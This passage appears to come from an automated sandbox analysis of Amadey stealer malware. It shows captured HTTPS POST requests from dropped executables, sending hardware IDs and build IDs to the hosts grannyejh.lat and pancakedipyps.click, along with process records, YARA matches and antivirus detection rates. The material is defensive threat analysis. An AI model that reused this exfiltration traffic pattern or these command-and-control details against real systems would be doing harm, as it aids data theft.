                                                                                                                                                                  Data Ascii: foyjS7bY9IGOl9fZoqhNC7M5R/TdFKvPBMuFDsjqKG6u3uFPpM0nTc5Vllome4hct2rFdQ7Af0wECoXMyeoo/v5NYUj2mTVEDVdUWqBoT84we4W339fsnxQah8na/vr1dIOwAfpLMJMLRleZ8/2fjDH5xrXfVCxNhchFDQvr6L/8zqHI9Jo0QgyWlpkgKE2fIqrFcA7Af0ZCSEWOWu85eO1PI5miyzRCzJfXGeOqDY5zO8T3n1asjgbKxc7J62h
                                                                                                                                                                  2024-12-18 10:09:44 UTC1369INData Raw: 38 74 77 57 76 53 42 6a 4e 56 58 32 53 4a 72 7a 73 32 79 4f 77 58 30 33 52 56 2f 58 4a 65 4c 51 42 2f 63 2b 4f 46 38 65 59 73 67 53 6a 59 65 73 5a 43 4b 78 64 41 4b 34 69 69 66 6d 53 45 36 42 6e 54 66 31 6d 78 50 42 6f 6e 47 43 30 6b 70 4b 7a 7a 2f 69 6d 49 49 64 52 6e 31 51 6b 37 58 30 74 6e 67 62 77 37 4c 74 61 72 58 4a 68 38 51 66 31 6b 58 68 77 66 4c 7a 75 67 36 63 76 6a 4f 4a 51 74 33 6d 43 64 48 58 70 41 47 57 79 44 37 6d 5a 38 77 75 51 62 32 33 52 59 74 44 41 54 4c 78 45 36 4b 71 57 76 38 50 38 37 68 43 44 53 61 64 63 42 4e 56 4e 51 62 49 65 70 50 53 36 45 70 56 4c 66 59 78 6e 6c 66 44 63 74 43 6a 45 37 34 37 53 30 37 48 75 46 4b 70 4d 30 6e 51 59 2b 56 6c 31 73 67 36 67 37 4f 73 6e 71 48 64 6c 37 56 72 6b 33 46 79 77 5a 4d 69 36 75 72 2b 6a 2f 4d
                                                                                                                                                                  Data Ascii: 8twWvSBjNVX2SJrzs2yOwX03RV/XJeLQB/c+OF8eYsgSjYesZCKxdAK4iifmSE6BnTf1mxPBonGC0kpKzz/imIIdRn1Qk7X0tngbw7LtarXJh8Qf1kXhwfLzug6cvjOJQt3mCdHXpAGWyD7mZ8wuQb23RYtDATLxE6KqWv8P87hCDSadcBNVNQbIepPS6EpVLfYxnlfDctCjE747S07HuFKpM0nQY+Vl1sg6g7OsnqHdl7Vrk3FywZMi6ur+j/M
                                                                                                                                                                  2024-12-18 10:09:44 UTC1369INData Raw: 73 33 51 67 78 55 31 52 6f 67 4b 30 73 50 63 4c 35 45 74 56 78 53 37 63 33 47 79 63 56 4d 69 69 6c 72 66 48 35 4b 59 73 6d 30 47 65 64 54 48 52 65 51 53 76 58 37 68 30 72 30 75 45 56 31 47 31 53 76 44 38 49 4a 77 68 2f 5a 65 4f 36 2f 65 52 37 32 6a 44 44 65 39 6f 64 65 6b 41 5a 62 49 50 75 5a 6e 7a 43 34 68 54 66 66 56 65 76 4f 52 67 6c 46 7a 59 69 70 36 50 35 39 54 2b 47 49 64 5a 76 30 51 6b 7a 57 6c 5a 76 68 71 41 33 4d 34 53 6c 55 74 39 6a 47 65 56 38 50 7a 45 62 4d 79 62 6a 74 4c 54 73 65 34 55 71 6b 7a 53 64 44 6a 70 63 57 57 47 4a 71 6a 73 36 7a 75 34 53 30 33 68 57 75 54 6f 61 4a 52 67 30 49 71 4b 74 2f 2f 38 77 68 43 76 51 61 74 74 43 65 68 6c 65 63 38 2f 32 66 68 7a 66 35 68 37 66 4f 30 62 7a 4a 56 34 74 46 48 39 7a 34 36 44 32 38 54 79 43 4b 39
                                                                                                                                                                  Data Ascii: s3QgxU1RogK0sPcL5EtVxS7c3GycVMiilrfH5KYsm0GedTHReQSvX7h0r0uEV1G1SvD8IJwh/ZeO6/eR72jDDe9odekAZbIPuZnzC4hTffVevORglFzYip6P59T+GIdZv0QkzWlZvhqA3M4SlUt9jGeV8PzEbMybjtLTse4UqkzSdDjpcWWGJqjs6zu4S03hWuToaJRg0IqKt//8whCvQattCehlec8/2fhzf5h7fO0bzJV4tFH9z46D28TyCK9
                                                                                                                                                                  2024-12-18 10:09:44 UTC290INData Raw: 47 31 35 50 61 4b 43 74 4c 7a 57 45 70 56 4c 66 62 52 6e 6c 66 43 42 71 43 6a 77 37 6f 4b 54 72 79 33 76 61 50 2b 30 73 31 68 51 7a 53 56 70 39 68 4b 4d 79 4c 66 71 72 53 6f 77 70 43 2b 39 75 54 44 56 59 49 42 54 74 36 2f 75 31 59 37 73 2f 6b 33 71 64 57 6d 59 58 47 58 6e 50 39 6e 35 37 78 2f 6b 41 33 6e 68 50 76 6e 73 67 46 44 38 70 49 61 53 37 2f 65 49 30 77 6d 69 54 59 35 31 61 44 52 6c 51 62 4a 53 2f 4b 44 48 55 37 46 4c 6e 4e 52 6d 6c 66 45 5a 71 4c 54 77 6c 72 61 7a 73 35 48 61 6c 4d 4e 6c 72 7a 51 55 6a 56 68 6b 6c 7a 36 68 2b 5a 4a 65 6c 55 74 78 71 47 65 56 73 54 48 46 4e 62 48 7a 7a 2b 65 57 37 49 73 49 77 6b 7a 53 50 54 48 52 4c 47 54 50 50 36 54 30 75 31 75 30 52 7a 6e 67 65 67 77 49 35 4d 42 55 35 50 4c 4b 56 78 50 49 68 6a 79 44 45 66 5a 45
                                                                                                                                                                  Data Ascii: G15PaKCtLzWEpVLfbRnlfCBqCjw7oKTry3vaP+0s1hQzSVp9hKMyLfqrSowpC+9uTDVYIBTt6/u1Y7s/k3qdWmYXGXnP9n57x/kA3nhPvnsgFD8pIaS7/eI0wmiTY51aDRlQbJS/KDHU7FLnNRmlfEZqLTwlrazs5HalMNlrzQUjVhklz6h+ZJelUtxqGeVsTHFNbHzz+eW7IsIwkzSPTHRLGTPP6T0u1u0RzngegwI5MBU5PLKVxPIhjyDEfZE
                                                                                                                                                                  2024-12-18 10:09:44 UTC1369INData Raw: 32 62 66 63 0d 0a 2b 7a 57 46 4d 4d 49 68 2b 68 67 35 58 30 35 36 7a 2b 42 2b 4f 6f 53 7a 51 70 59 37 58 61 78 38 52 6e 70 4b 5a 48 37 77 2f 4b 71 6e 4a 4d 77 2f 6b 33 71 64 57 6d 59 58 47 58 6e 50 39 6e 35 37 78 2f 6b 41 33 6e 68 50 76 6e 73 67 46 44 59 34 4c 61 61 73 36 72 63 56 69 54 4c 55 4c 4a 4e 43 4f 78 6b 42 55 73 2f 6d 66 67 4f 4b 71 77 71 59 49 78 6d 49 50 78 41 6b 48 79 6b 36 37 6f 58 39 38 7a 36 46 4e 70 46 43 31 68 59 7a 47 52 63 72 69 65 35 6d 62 49 71 72 46 73 6b 37 41 65 31 75 52 58 39 4c 61 48 76 78 74 4c 54 73 65 35 52 6d 69 7a 36 54 51 69 59 5a 41 53 76 49 72 53 77 75 77 75 67 45 32 7a 78 6e 67 7a 38 49 4a 78 63 30 4b 70 32 56 31 50 67 36 67 53 69 52 58 63 73 50 4a 46 70 63 62 4c 47 51 4d 44 76 51 37 42 7a 65 65 78 6e 7a 66 42 46 71 51
                                                                                                                                                                  Data Ascii: 2bfc+zWFMMIh+hg5X056z+B+OoSzQpY7Xax8RnpKZH7w/KqnJMw/k3qdWmYXGXnP9n57x/kA3nhPvnsgFDY4Laas6rcViTLULJNCOxkBUs/mfgOKqwqYIxmIPxAkHyk67oX98z6FNpFC1hYzGRcrie5mbIqrFsk7Ae1uRX9LaHvxtLTse5Rmiz6TQiYZASvIrSwuwugE2zxngz8IJxc0Kp2V1Pg6gSiRXcsPJFpcbLGQMDvQ7BzeexnzfBFqQ
                                                                                                                                                                  2024-12-18 10:09:44 UTC1369INData Raw: 76 36 37 56 6a 30 6e 53 49 4f 59 35 56 5a 41 74 47 4a 5a 62 75 4b 48 79 63 75 56 79 59 61 52 6e 6c 66 46 6b 70 43 69 30 74 6f 4c 33 35 73 67 57 38 41 64 31 72 33 42 51 6b 56 46 56 4b 6a 4c 38 30 41 76 72 2b 45 64 5a 31 58 71 73 74 58 6d 52 59 4d 47 76 37 6b 72 71 39 65 37 31 6f 6b 33 53 64 57 6e 52 73 57 6d 57 42 71 53 67 74 69 63 77 63 33 33 70 50 72 54 45 53 43 78 73 75 49 65 50 6c 75 76 4e 37 32 6e 53 64 4c 4e 6b 54 64 41 45 4a 4f 64 54 37 62 57 75 55 75 51 32 57 59 68 6d 72 66 45 5a 34 56 6e 38 35 34 2f 4f 36 73 6a 69 51 4e 4e 56 76 79 77 46 7a 5a 32 64 4f 6d 4b 30 75 4f 73 66 56 4c 50 4e 33 58 37 6f 6d 47 53 77 2b 48 32 76 74 36 2f 57 31 59 37 74 6d 6d 79 7a 69 54 48 52 42 47 54 50 50 6d 7a 30 79 79 75 77 45 79 54 5a 38 71 6a 38 4f 4c 42 74 2f 5a 65
                                                                                                                                                                  Data Ascii: v67Vj0nSIOY5VZAtGJZbuKHycuVyYaRnlfFkpCi0toL35sgW8Ad1r3BQkVFVKjL80Avr+EdZ1XqstXmRYMGv7krq9e71ok3SdWnRsWmWBqSgticwc33pPrTESCxsuIePluvN72nSdLNkTdAEJOdT7bWuUuQ2WYhmrfEZ4Vn854/O6sjiQNNVvywFzZ2dOmK0uOsfVLPN3X7omGSw+H2vt6/W1Y7tmmyziTHRBGTPPmz0yyuwEyTZ8qj8OLBt/Ze


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  4192.168.2.649959172.67.179.109443340C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2024-12-18 10:09:42 UTC270OUTPOST /api HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: multipart/form-data; boundary=A5BVGTFOW
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                  Content-Length: 12810
                                                                                                                                                                  Host: grannyejh.lat
                                                                                                                                                                  2024-12-18 10:09:42 UTC12810OUTData Raw: 2d 2d 41 35 42 56 47 54 46 4f 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 34 45 43 38 34 45 31 41 35 34 30 46 32 46 43 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 41 35 42 56 47 54 46 4f 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 41 35 42 56 47 54 46 4f 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 38 39 37 38 33 33 37 30 0d 0a 2d 2d 41 35 42 56 47 54 46 4f 57 0d 0a 43 6f 6e 74 65 6e 74
                                                                                                                                                                  Data Ascii: --A5BVGTFOWContent-Disposition: form-data; name="hwid"04EC84E1A540F2FC00D57F9DDD37BE0C--A5BVGTFOWContent-Disposition: form-data; name="pid"2--A5BVGTFOWContent-Disposition: form-data; name="lid"yau6Na--6989783370--A5BVGTFOWContent
                                                                                                                                                                  2024-12-18 10:09:49 UTC1033INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Wed, 18 Dec 2024 10:09:48 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Set-Cookie: PHPSESSID=mhi5cvvklancm26nvgvlunchv1; expires=Sun, 13-Apr-2025 03:56:23 GMT; Max-Age=9999999; path=/
                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8V%2FeYDCiNmY8VZCnYOfbkwcCFxx2pbHFfercylbfWyShDo1sK63DghUA89aau7cGA31lIdNBRPKaZKOlcRj5cgoX5q6fFhx%2BvyxfwHIQd%2Bo1bqPJL1EyIGjEqjB8IojL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8f3e5be48ee718f6-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1754&min_rtt=1661&rtt_var=689&sent=12&recv=17&lost=0&retrans=0&sent_bytes=2829&recv_bytes=13738&delivery_rate=1757977&cwnd=211&unsent_bytes=0&cid=a757767a11d3624e&ts=6243&x=0"
                                                                                                                                                                  2024-12-18 10:09:49 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                  2024-12-18 10:09:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  5192.168.2.649971104.21.23.764434196C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2024-12-18 10:09:46 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: multipart/form-data; boundary=ILVZO8LAVB6S
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                  Content-Length: 12822
                                                                                                                                                                  Host: pancakedipyps.click
                                                                                                                                                                  2024-12-18 10:09:46 UTC12822OUTData Raw: 2d 2d 49 4c 56 5a 4f 38 4c 41 56 42 36 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 34 45 43 38 34 45 31 41 35 34 30 46 32 46 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 49 4c 56 5a 4f 38 4c 41 56 42 36 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 49 4c 56 5a 4f 38 4c 41 56 42 36 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 49 4c 56 5a 4f 38 4c 41 56 42 36 53 0d 0a 43
                                                                                                                                                                  Data Ascii: --ILVZO8LAVB6SContent-Disposition: form-data; name="hwid"04EC84E1A540F2FCAC8923850305D13E--ILVZO8LAVB6SContent-Disposition: form-data; name="pid"2--ILVZO8LAVB6SContent-Disposition: form-data; name="lid"FATE99--test--ILVZO8LAVB6SC
                                                                                                                                                                  2024-12-18 10:09:56 UTC1037INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Wed, 18 Dec 2024 10:09:56 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Set-Cookie: PHPSESSID=6hrlgfdbfhjh6atrhmgnuu2nar; expires=Sun, 13-Apr-2025 03:56:26 GMT; Max-Age=9999999; path=/
                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hyMKd3yxMEDzKiMSgRXJh8v1IE1LVOf4crezjW3Jn2b7V3toPr%2BcL94JyRCxpHEj21sAbKYLYWCujBFKysk3dJwQYPAJSjuK5DRCXIZelRQ3pAXhP4K0j3EKPim3nwmgOUCyHmWw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8f3e5bf7ab406a57-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1774&min_rtt=1725&rtt_var=682&sent=9&recv=16&lost=0&retrans=0&sent_bytes=2848&recv_bytes=13759&delivery_rate=1692753&cwnd=231&unsent_bytes=0&cid=b8075df92fb8f11c&ts=10616&x=0"
                                                                                                                                                                  2024-12-18 10:09:56 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                  2024-12-18 10:09:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  6192.168.2.649980172.67.179.109443340C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2024-12-18 10:09:50 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: multipart/form-data; boundary=NLADBOIZ7F5IUIG50VN
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                  Content-Length: 15116
                                                                                                                                                                  Host: grannyejh.lat
                                                                                                                                                                  2024-12-18 10:09:50 UTC15116OUTData Raw: 2d 2d 4e 4c 41 44 42 4f 49 5a 37 46 35 49 55 49 47 35 30 56 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 34 45 43 38 34 45 31 41 35 34 30 46 32 46 43 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 4e 4c 41 44 42 4f 49 5a 37 46 35 49 55 49 47 35 30 56 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4e 4c 41 44 42 4f 49 5a 37 46 35 49 55 49 47 35 30 56 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39
                                                                                                                                                                  Data Ascii: --NLADBOIZ7F5IUIG50VNContent-Disposition: form-data; name="hwid"04EC84E1A540F2FC00D57F9DDD37BE0C--NLADBOIZ7F5IUIG50VNContent-Disposition: form-data; name="pid"2--NLADBOIZ7F5IUIG50VNContent-Disposition: form-data; name="lid"yau6Na--69


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  7192.168.2.650000104.21.23.764434196C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2024-12-18 10:09:58 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: multipart/form-data; boundary=41IXZLLKRRXJT9R
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                  Content-Length: 15086
                                                                                                                                                                  Host: pancakedipyps.click
                                                                                                                                                                  2024-12-18 10:09:58 UTC15086OUTData Raw: 2d 2d 34 31 49 58 5a 4c 4c 4b 52 52 58 4a 54 39 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 34 45 43 38 34 45 31 41 35 34 30 46 32 46 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 34 31 49 58 5a 4c 4c 4b 52 52 58 4a 54 39 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 31 49 58 5a 4c 4c 4b 52 52 58 4a 54 39 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 34 31 49 58 5a 4c
                                                                                                                                                                  Data Ascii: --41IXZLLKRRXJT9RContent-Disposition: form-data; name="hwid"04EC84E1A540F2FCAC8923850305D13E--41IXZLLKRRXJT9RContent-Disposition: form-data; name="pid"2--41IXZLLKRRXJT9RContent-Disposition: form-data; name="lid"FATE99--test--41IXZL


                                                                                                                                                                  Statistics

                                                                                                                                                                  CPU Usage

                                                                                                                                                                  Click to jump to process

                                                                                                                                                                  Memory Usage

                                                                                                                                                                  Click to jump to process

                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                  Behavior

                                                                                                                                                                  Click to jump to process

                                                                                                                                                                  System Behavior

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:0
                                                                                                                                                                  Start time:05:07:51
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                  Imagebase:0xfb0000
                                                                                                                                                                  File size:2'943'488 bytes
                                                                                                                                                                  MD5 hash:65F41A5703887BEEBA49A84CA30BAE19
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Yara matches:
                                                                                                                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2131654122.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2172859499.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:2
                                                                                                                                                                  Start time:05:07:54
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                                                                                  Imagebase:0x610000
                                                                                                                                                                  File size:2'943'488 bytes
                                                                                                                                                                  MD5 hash:65F41A5703887BEEBA49A84CA30BAE19
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Yara matches:
                                                                                                                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2160965888.0000000004710000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2201284335.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                  • Detection: 53%, ReversingLabs
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:3
                                                                                                                                                                  Start time:05:07:55
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                  Imagebase:0x610000
                                                                                                                                                                  File size:2'943'488 bytes
                                                                                                                                                                  MD5 hash:65F41A5703887BEEBA49A84CA30BAE19
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Yara matches:
                                                                                                                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.2217401983.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.2177174832.0000000005290000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:6
                                                                                                                                                                  Start time:05:09:00
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                  Imagebase:0x610000
                                                                                                                                                                  File size:2'943'488 bytes
                                                                                                                                                                  MD5 hash:65F41A5703887BEEBA49A84CA30BAE19
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Yara matches:
                                                                                                                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.2820833506.0000000004C60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Has exited:false

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:8
                                                                                                                                                                  Start time:05:09:12
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exe"
                                                                                                                                                                  Imagebase:0xd90000
                                                                                                                                                                  File size:765'568 bytes
                                                                                                                                                                  MD5 hash:8A9CB17C0224A01BD34B46495983C50A
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                  • Detection: 75%, ReversingLabs
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:9
                                                                                                                                                                  Start time:05:09:12
                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

